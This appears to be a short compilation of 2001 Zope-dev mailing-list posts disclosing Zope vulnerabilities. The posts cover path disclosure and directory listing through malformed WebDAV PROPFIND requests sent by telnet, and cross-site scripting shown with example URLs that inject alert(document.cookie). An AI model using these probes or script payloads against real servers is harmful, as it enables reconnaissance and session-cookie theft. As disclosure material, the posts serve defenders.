[Zope-dev] Vulnerability in Zope

Found vulnerability: retrieve a full path to local files in Zope. ---[ Example 1 (Linux): telnet www.zope.org 80 PROPFIND / HTTP/1.0 F G H J K L HTTP/1.0 500 Internal Server Error Server: Zope/Zope 2.3.2 (source release, python 1.5.2, linux2) ZServer/1.1b1 Date: Mon, 10 Sep 2001 15:38:59 GMT C

[Zope-dev] New: Cross Site Scripting vulnerability

Example: http://www.zope.org/Documentation/alert(document.domain) http://www.zope.org/lalalalalalert(document.domain) http://www.zope.org/alert(document.cookie) For example, an attacker might post a message like Hello message board. This is a message. malicious code

[Zope-dev] Vulnerability: attacking can get file list and directory

Vulnerability: attacking can get file list and directory Tested on Win32 platform Example: telnet zopeserver 8080 PROPFIND / HTTP/1.0 < list files and directory > This tested on my site: security.instock.ru 8080 ___ Zope-Dev maillist - [EMAIL P